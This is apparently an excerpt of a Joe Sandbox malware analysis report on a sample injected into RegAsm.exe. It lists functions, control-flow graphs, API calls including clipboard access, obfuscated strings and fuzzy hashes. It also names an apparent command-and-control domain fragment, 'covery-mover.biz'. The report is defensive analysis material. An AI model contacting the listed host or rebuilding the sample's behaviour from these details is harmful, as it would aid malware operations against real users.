                                        • Opcode ID: d47076afbd05a78a046f2f951199cb1dbd1ea0c989cd37d394d3fd4149bb2193
                                        • Instruction ID: 966b8f91f76bb20883ed88500b6b89ab0c93423946d56f050922860fedc986fe
                                        • Opcode Fuzzy Hash: d47076afbd05a78a046f2f951199cb1dbd1ea0c989cd37d394d3fd4149bb2193
                                        • Instruction Fuzzy Hash: D7C1267260C3504BC714CF6488905AFBBD3ABC2304F1E893DE9D56B382D679991AC78B
                                        Function 0040CE55 Relevance: 9.0, Strings: 7, Instructions: 275COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 139 40ce55-40ce62 140 40ce70-40ce9b 139->140 140->140 141 40ce9d-40ced5 call 408720 call 436f90 140->141 146 40cee0-40cf06 141->146 146->146 147 40cf08-40cf6b 146->147 148 40cf70-40cfa7 147->148 148->148 149 40cfa9-40cfba 148->149 150 40cfc0-40cfcb 149->150 151 40d03d 149->151 152 40cfd0-40cfd9 150->152 153 40d041-40d049 151->153 152->152 154 40cfdb 152->154 155 40d05b-40d068 153->155 156 40d04b-40d04f 153->156 154->153 158 40d06a-40d071 155->158 159 40d08b-40d093 155->159 157 40d050-40d059 156->157 157->155 157->157 160 40d080-40d089 158->160 161 40d095-40d096 159->161 162 40d0ab-40d1c6 159->162 160->159 160->160 163 40d0a0-40d0a9 161->163 164 40d1d0-40d215 162->164 163->162 163->163 164->164 165 40d217-40d239 164->165 166 40d240-40d250 165->166 166->166 167 40d252-40d27f call 40b6a0 166->167 169 40d284-40d29e 167->169
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: DC1DC1D8A16E672B23D904AF30EFEBBC$F^$I@$N~ :$VgfW$covery-mover.biz$z@(
                                        • API String ID: 0-185715968
                                        • Opcode ID: 12efaed7f1b54f12da6bbf58353711d555d00ce7dd5b906222aedfdf9b1c7be8
                                        • Instruction ID: b1d760c26d9b90ec4573806c6615211f8657e28aa76e89aec63d6860f5017e85
                                        • Opcode Fuzzy Hash: 12efaed7f1b54f12da6bbf58353711d555d00ce7dd5b906222aedfdf9b1c7be8
                                        • Instruction Fuzzy Hash: A191EEB05083C18BD335CF25D8A0BEBBBE0AB96314F148D6DD4DD9B282D738454ACB96
                                        Function 004087F0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 127threadCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 170 4087f0-4087fe call 43afd0 173 408804-40880b call 434680 170->173 174 408979-40897b ExitProcess 170->174 177 408811-408849 GetCurrentProcessId GetCurrentThreadId 173->177 178 408974 call 43b400 173->178 180 408851-4088d6 GetForegroundWindow 177->180 181 40884b-40884f 177->181 178->174 182 408950-408968 call 409cc0 180->182 183 4088d8-40894e 180->183 181->180 182->178 186 40896a call 40cdf0 182->186 183->182 188 40896f call 40b670 186->188 188->178
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID: CurrentProcess$ExitForegroundThreadWindow
                                        • String ID: YO9W
                                        • API String ID: 3118123366-386669604
                                        • Opcode ID: 81875feee291dd51c94163340b3786e966dc5896524b3e4d2eaf5977dbc455ff
                                        • Instruction ID: 5b12a659e8285d1355c3597aa5681aa9478bfa7506ef17589c1493984f4e9e7d
                                        • Opcode Fuzzy Hash: 81875feee291dd51c94163340b3786e966dc5896524b3e4d2eaf5977dbc455ff
                                        • Instruction Fuzzy Hash: 98315977F5061807C31C7AB98C4636AB5874BC4614F0F863E9DD9AB386FDB89C0442D9
                                        Function 0043B480 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 228 43b480-43b4b2 LdrInitializeThunk
                                        APIs
                                        • LdrInitializeThunk.NTDLL(0043D4FB,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043B4AE
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                        • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                        • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                        • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                        Function 00409CC0 Relevance: 1.3, Strings: 1, Instructions: 64COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 253 409cc0-409cdf 254 409ce0-409cfa 253->254 254->254 255 409cfc-409d37 254->255 256 409d40-409d69 255->256 256->256 257 409d6b-409d72 256->257 258 409d75-409d98 call 43af90 257->258
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: \U^_
                                        • API String ID: 0-352632802
                                        • Opcode ID: b233260ff75ba58cbb536c0014e0eb0df055bc4e14581868770786c388d706bb
                                        • Instruction ID: 5fa690bb4235e6f9a1b833386d74a381627e7adb8b1be8a89cbf23ee07b36487
                                        • Opcode Fuzzy Hash: b233260ff75ba58cbb536c0014e0eb0df055bc4e14581868770786c388d706bb
                                        • Instruction Fuzzy Hash: D011E23060C3808FD324DF3495549ABBBA5EFD7748F545A2CE4C56B281C735980A8FAA
                                        Function 0043B720 Relevance: 3.0, APIs: 2, Instructions: 31COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        • GetForegroundWindow.USER32 ref: 0043B720
                                        • GetForegroundWindow.USER32 ref: 0043B740
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID: ForegroundWindow
                                        • String ID:
                                        • API String ID: 2020703349-0
                                        • Opcode ID: a4781643aa2d8fd57512208f1c3e62aa4b8d5176cb57333a04816d28865289df
                                        • Instruction ID: 191facca889f69fa70601903ca8693053aaba1cbaba24685dbffd0b384c421fe
                                        • Opcode Fuzzy Hash: a4781643aa2d8fd57512208f1c3e62aa4b8d5176cb57333a04816d28865289df
                                        • Instruction Fuzzy Hash: 7ED0A7FDD20110EBC604AB71FC4A41B3A1AEB4722DB545539EC0343352DA39782E868F
                                        Function 0040CDF0 Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 226 40cdf0-40ce20 CoInitializeEx
                                        APIs
                                        • CoInitializeEx.COMBASE(00000000,00000002), ref: 0040CE03
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID: Initialize
                                        • String ID:
                                        • API String ID: 2538663250-0
                                        • Opcode ID: 61d928746ba4ae58ea54a0875f1c3d0382ed5290a25c5d8e3ced17899992ccae
                                        • Instruction ID: f1973b7854016afe0481596635c710bb103935c4c1c993b3491e04eff0e8badb
                                        • Opcode Fuzzy Hash: 61d928746ba4ae58ea54a0875f1c3d0382ed5290a25c5d8e3ced17899992ccae
                                        • Instruction Fuzzy Hash: 01D0A7345545486BD250A75CDD0BF563A5C9703B29F400239B763D61D1D9506920C669
                                        Function 0040CE23 Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 227 40ce23-40ce52 CoInitializeSecurity
                                        APIs
                                        • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040CE35
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID: InitializeSecurity
                                        • String ID:
                                        • API String ID: 640775948-0
                                        • Opcode ID: 9269880a45a3c80f6ec8299234c73a1314589920fa48725fb3d67ea21efaca66
                                        • Instruction ID: 9bb2948b1e33ad1240181575e0f5375bfb099cf60bc3df2fdc322b3d55e14239
                                        • Opcode Fuzzy Hash: 9269880a45a3c80f6ec8299234c73a1314589920fa48725fb3d67ea21efaca66
                                        • Instruction Fuzzy Hash: CAD0C9343D83007AF5748B48ED53F1432169702F11FB00629F322FE6D4C9E07121861D
                                        Function 0040D2C5 Relevance: 1.3, APIs: 1, Instructions: 9COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 264 40d2c5-40d2cd CoUninitialize 265 40e062-40e069 264->265
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID: Uninitialize
                                        • String ID:
                                        • API String ID: 3861434553-0
                                        • Opcode ID: 5707253a0f4c189d33386fe30951e2cae249061f9284b9e86972a201113a272f
                                        • Instruction ID: aa1ebcc13e0591ffa587ed879dc96101c66d2de581aeeee77924bd980006153c
                                        • Opcode Fuzzy Hash: 5707253a0f4c189d33386fe30951e2cae249061f9284b9e86972a201113a272f
                                        • Instruction Fuzzy Hash: 1AB0923AA1A015DE8A0047A5B8480D8F360E6882A67508873E31AE2010D231113A4656

                                        Non-executed Functions

                                        Function 00412670 Relevance: 165.6, Strings: 131, Instructions: 1885COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $ $!$"$$$&$'$*$,$.$.$/$/$1$3$3$4$6$8$8$9$:$@$@$A$D$D$D$E$F$H$I$I$J$J$K$L$L$M$N$O$O$P$R$T$U$V$V$W$X$Y$Y$Z$Z$Z$[$\$\$]$^$`$`$`$`$`$`$`$`$a$a$a$a$a$a$a$a$b$b$b$b$b$b$b$c$c$c$c$c$c$d$e$f$f$f$g$h$h$j$l$l$m$n$o$p$p$p$q$q$r$r$r$s$t$t$u$v$w$w$x$x$y$y$z${${$|$|$|$}$~$~
                                        • API String ID: 0-970517751
                                        • Opcode ID: b935f384ca54683a4ca31a6a4a577467b87093545c2e1a959a98bc83544e7568
                                        • Instruction ID: eb2ea25b501750350b52f307c1a87468cb49357f6a4e324b0e4b270eb01e31bc
                                        • Opcode Fuzzy Hash: b935f384ca54683a4ca31a6a4a577467b87093545c2e1a959a98bc83544e7568
                                        • Instruction Fuzzy Hash: 45039D7110C7C08AD325DB3885843DFBBE2ABD6314F188A6EE1E9873D2D6798585C71B
                                        Function 00431BB0 Relevance: 47.4, APIs: 2, Strings: 25, Instructions: 179COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID: MetricsSystem
                                        • String ID: $&)C$;(C$="C$="C$="C$="C$="C$="C$="C$="C$="C$="C$="C$="C$="C$="C$="C$="C$="C$="C$='C$S%C$b(C$#C
                                        • API String ID: 4116985748-628680385
                                        • Opcode ID: c4360614f8f82c5e27f19abdd04c6f864ef0af49341f313285d7bdd33a848109
                                        • Instruction ID: ea45c71986b2e534ecec44a4126f62931ddcc8577b73b097e58ed3aa899a90b6
                                        • Opcode Fuzzy Hash: c4360614f8f82c5e27f19abdd04c6f864ef0af49341f313285d7bdd33a848109
                                        • Instruction Fuzzy Hash: 41B16FB04097818FE771DF14D48879BBBE0BBC5308F508A2EE5E89B251CBB95448CF86
                                        Function 00423E4B Relevance: 34.4, Strings: 27, Instructions: 700COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: #l%n$$h+j$*|.~$*;$*;$.`1b$.p r$3d4f$3M$5$5;$5;$5I$96$96$:xz$:xz$;H$;=$?1$BSB$KX&Z$KM$LM$\$\]$tv
                                        • API String ID: 0-2144453301
                                        • Opcode ID: 2fafde579302429f393e93c8b007b0d9fe794dcac7e70ccc745c0248d3875073
                                        • Instruction ID: 02eb6ca72729b77c0c517bad882bc54f1721a4cd1cfb35057a0e712941df6505
                                        • Opcode Fuzzy Hash: 2fafde579302429f393e93c8b007b0d9fe794dcac7e70ccc745c0248d3875073
                                        • Instruction Fuzzy Hash: C56250B560C3918AD330CF14E841B9BBBF1FBC2304F80892DD9D99B251D675994ACB9B
                                        Function 004215F0 Relevance: 28.1, Strings: 22, Instructions: 608COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: !@$$$,$,$/$/$=$?$`$`$`$a$a$a$b$b$b$c$c$c$x$y
                                        • API String ID: 0-2322859148
                                        • Opcode ID: ac7828d93f88749587bf053ed3609d6ede44a0fa959ed21f77b42e633a8578f9
                                        • Instruction ID: a9e4235a5477e646960bee548e6a60db3c3433cdc1e43feab013a68861c4041f
                                        • Opcode Fuzzy Hash: ac7828d93f88749587bf053ed3609d6ede44a0fa959ed21f77b42e633a8578f9
                                        • Instruction Fuzzy Hash: 9C32247160C3908FD3248B28D49136FFBE1ABE5314F59492EE5D5873A2D6BD8841CB4B
                                        Function 00436690 Relevance: 19.0, Strings: 15, Instructions: 246COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: #$5$C$X$X$Y$Y$Z$Z$\$`$e$i$j$~
                                        • API String ID: 0-3294723363
                                        • Opcode ID: 218b22c1c0bb5ff38fa90c5a0a5a95447d190bf781458c7b06e1a19171da4b10
                                        • Instruction ID: d06cdc3dbbba6fd9ac46771ee23930370a381fe40efeef2ce659a2012e58e6f7
                                        • Opcode Fuzzy Hash: 218b22c1c0bb5ff38fa90c5a0a5a95447d190bf781458c7b06e1a19171da4b10
                                        • Instruction Fuzzy Hash: F4910623A0D7D14AD3058538880435FEED30BEA224F6ECA6ED4E9873C6C57DC90687A3
                                        Function 00419C10 Relevance: 15.3, APIs: 2, Strings: 6, Instructions: 1297COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0043B480: LdrInitializeThunk.NTDLL(0043D4FB,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043B4AE
                                        • FreeLibrary.KERNEL32(?), ref: 0041A21A
                                        • FreeLibrary.KERNEL32(?), ref: 0041A29B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID: FreeLibrary$InitializeThunk
                                        • String ID: I,~M$PQ$cba`$cba`$cba`$wEtG
                                        • API String ID: 764372645-3803835663
                                        • Opcode ID: 47063c938c01330124c9dc59b6d375a3b8a360990f39732c0e3748d67b9dcd4f
                                        • Instruction ID: ce701afe96e54189f6fff091c8333c98f5ae15aa60c98f01a083bef101dadeb2
                                        • Opcode Fuzzy Hash: 47063c938c01330124c9dc59b6d375a3b8a360990f39732c0e3748d67b9dcd4f
                                        • Instruction Fuzzy Hash: C59235746093409FE714CF65D891B6BBBE2EBD5300F28882EE58487391D7799C81CB9B
                                        Function 00424D70 Relevance: 14.4, Strings: 11, Instructions: 627COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 0MB$3M$;=$?1$AK$BSB$NO$cba`$sF$~$_A
                                        • API String ID: 0-1547998400
                                        • Opcode ID: 0979c079486d7a7852b00a598c97ab370eb9193afc66a543d39376835cc69fb4
                                        • Instruction ID: f216ed7a0f42d5910be755489e032facae88754772da87564cfe1883718cc258
                                        • Opcode Fuzzy Hash: 0979c079486d7a7852b00a598c97ab370eb9193afc66a543d39376835cc69fb4
                                        • Instruction Fuzzy Hash: 03121436A187228BC324DF28D8806ABB3F1FFC5344F56896DE5858B360E7749D05CB86
                                        Function 0040E2A9 Relevance: 14.0, APIs: 2, Strings: 7, Instructions: 529COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID: Uninitialize
                                        • String ID: "# `$,$I~$`~$covery-mover.biz$qx$s
                                        • API String ID: 3861434553-1062613949
                                        • Opcode ID: e63ad190dbb3cc9d0db4617570c312577fbe532b1e6065bb2384142a9fd66077
                                        • Instruction ID: 550626b1aa1881637dc35d229a9c1637f44e71d1f63aa888f187a22684203b49
                                        • Opcode Fuzzy Hash: e63ad190dbb3cc9d0db4617570c312577fbe532b1e6065bb2384142a9fd66077
                                        • Instruction Fuzzy Hash: 2902B0B010C3D18BD3358F2684A07EBBFE1EF92304F189DADD4DA6B252D679040A8B57
                                        Function 00425920 Relevance: 12.9, Strings: 10, Instructions: 398COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: z%|$"r,t$&f?x$3v#H$<b"d$=j9l$cba`$cba`$Z\$^P
                                        • API String ID: 0-3047316687
                                        • Opcode ID: 45c83a3ddc5386c7eaecb6d0721308efe7616dc8ac7a87c6f5778f813dbd46f5
                                        • Instruction ID: 146473404e5499b4986dffa8d26f26e1c07bf5215faae6f3d7194190b628d0b4
                                        • Opcode Fuzzy Hash: 45c83a3ddc5386c7eaecb6d0721308efe7616dc8ac7a87c6f5778f813dbd46f5
                                        • Instruction Fuzzy Hash: C2D124B9608380DFE324DF15E88176BB7E1FBD5304F94982DE58587261D738D901CB4A
                                        Function 004233A0 Relevance: 12.7, APIs: 1, Strings: 6, Instructions: 471COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: #R,T$$^<P$VW$]~"p$ij$KM
                                        • API String ID: 0-788320361
                                        • Opcode ID: 0ef6ac19612ecc2b18e822a80ca420e4bb8027dd0eadc437e0bac95af6737912
                                        • Instruction ID: 9ed236048ece28067beed024fb633757567cd4a7e3bca11c75bb2a7735f0e68b
                                        • Opcode Fuzzy Hash: 0ef6ac19612ecc2b18e822a80ca420e4bb8027dd0eadc437e0bac95af6737912
                                        • Instruction Fuzzy Hash: D1F1CAB46083509FD310DF65E88262BBBF1EFD5304F44892DE4958B351EB789A06CB4B
                                        Function 00431A30 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 109clipboardCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
                                        • String ID: K
                                        • API String ID: 2832541153-856455061
                                        • Opcode ID: 027abc228ed841da0674a97a3735ab7f080d79d715808bd082ae78d0cbe3e8e1
                                        • Instruction ID: 513562b2ac7e6d1d4712994eff6d7c1bc04b9d90a7c3137532ed1f51a9abc6ba
                                        • Opcode Fuzzy Hash: 027abc228ed841da0674a97a3735ab7f080d79d715808bd082ae78d0cbe3e8e1
                                        • Instruction Fuzzy Hash: 34418E6150C7818ED310AF7C988826FBFE09B96224F044A6EE8E5872D2E6389549C797
                                        Function 00409360 Relevance: 10.4, Strings: 8, Instructions: 405COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: /37)$8>&:$YAG~u$`;;2$`;;2$u$}x$
                                        • API String ID: 0-2031701488
                                        • Opcode ID: afbf182f086d4cb3678fef5cd9cf034a3b5aeb1cf8c39da1fee8d2667e1554dd
                                        • Instruction ID: 68186ed99558166210f0fcd42b99c8c2f62b0175f04f1e675d22ffc3d0d5a109
                                        • Opcode Fuzzy Hash: afbf182f086d4cb3678fef5cd9cf034a3b5aeb1cf8c39da1fee8d2667e1554dd
                                        • Instruction Fuzzy Hash: 5CC1F67150C3918BD319CF2984A03ABBFD2AFD7215F1889ADE4D25B3C2D6398D09C796
                                        Function 004296D8 Relevance: 9.1, Strings: 7, Instructions: 340COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: );?g$9nI9$;>*2$='0{$[93=$cba`$fa
                                        • API String ID: 0-154584671
                                        • Opcode ID: 3e51a02978bc99ce7d016768a4801fe2a924607298026115374562d3702a8947
                                        • Instruction ID: 21be1e4f2e6752f9380b4aadbcf4cd787e7e0f4b09ea5b297d7e9ef9a1fb0c4b
                                        • Opcode Fuzzy Hash: 3e51a02978bc99ce7d016768a4801fe2a924607298026115374562d3702a8947
                                        • Instruction Fuzzy Hash: 3FC1077560C3A08FC3118F29D89066BBBE2AF96310F588A6DF4E1573D2C7398D45CB5A
                                        Function 0041DE40 Relevance: 8.4, Strings: 6, Instructions: 886COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: @@=:$I6F8$J:<<$P9&'$n$-+
                                        • API String ID: 0-2611983443
                                        • Opcode ID: c45ed84dc9fbc92dafa2b4c7a388b636a73cdc03055905ef9755abf4baf2e3c6
                                        • Instruction ID: c878bbecd244461bdf7002393a4f7c895ed20244a5d7bed5cbfbc41bef4b96db
                                        • Opcode Fuzzy Hash: c45ed84dc9fbc92dafa2b4c7a388b636a73cdc03055905ef9755abf4baf2e3c6
                                        • Instruction Fuzzy Hash: 26526A7550C3908FC725DF25C8406AFBBE1AF96304F08866EECE45B392DB398946C796
                                        Function 0041C360 Relevance: 8.1, Strings: 6, Instructions: 626COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: =z9|$JK$Vj)l$}~$CE$GI
                                        • API String ID: 0-2837980318
                                        • Opcode ID: 1d78ecb592161844fdb1d70b49100f2adcb6c2f4e1b931356bca3f21c3e11650
                                        • Instruction ID: e6571e83d39cc411a0f6c30d6b338ee8b8b0e658176ffc556d576db30a7076d6
                                        • Opcode Fuzzy Hash: 1d78ecb592161844fdb1d70b49100f2adcb6c2f4e1b931356bca3f21c3e11650
                                        • Instruction Fuzzy Hash: 5602FFB554C3408FC704DF69D8926ABBBE2EFD5314F08986DE4C68B351E7388605CB9A
                                        Function 0042D085 Relevance: 6.6, Strings: 5, Instructions: 368COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: #$0$AGsW$P$k
                                        • API String ID: 0-1629916805
                                        • Opcode ID: a92c176f258902a07af39c1f8e4a41f6c7503ef90e7a1abad74dc0064dca0dbd
                                        • Instruction ID: 8816b6b3b95a3b8c405e0a0f8c285763547ceed8af8c8b555c70c7a9f783aa76
                                        • Opcode Fuzzy Hash: a92c176f258902a07af39c1f8e4a41f6c7503ef90e7a1abad74dc0064dca0dbd
                                        • Instruction Fuzzy Hash: 1CC1F4317183918ED328CF39D4513ABBBD2AFD2304F68866ED4D58B2D1D6798449C71B
                                        Function 00436C40 Relevance: 6.5, Strings: 5, Instructions: 265COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: `$a$b$c$cba`cba`
                                        • API String ID: 0-3925122358
                                        • Opcode ID: 5e1df088af1431bf05ca1571bfd6cdbdd7f3fabc29e584d71a065595dab268f0
                                        • Instruction ID: 716de675438fc7be0f84b9257b2f5ff0fcac0ae5b07daa8bb6709f6b9bb0c7b9
                                        • Opcode Fuzzy Hash: 5e1df088af1431bf05ca1571bfd6cdbdd7f3fabc29e584d71a065595dab268f0
                                        • Instruction Fuzzy Hash: 5FA14975E083459FDB04CFA8C4513AEBFF2AB9A310F1AC06ED44697392C67D8905C79A
                                        Function 0040C36E Relevance: 6.5, Strings: 5, Instructions: 203COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: ){+}$4cde$CJ$F'k)$GS
                                        • API String ID: 0-4192230409
                                        • Opcode ID: 5de04a91f599762488a7f1befa48500976ff1de46b0c1ed8ec4e4c363fac47c6
                                        • Instruction ID: 6afdb2316fdadaf12e32bd698f1912d34734f08b0bc4a82971b76fff6b28e520
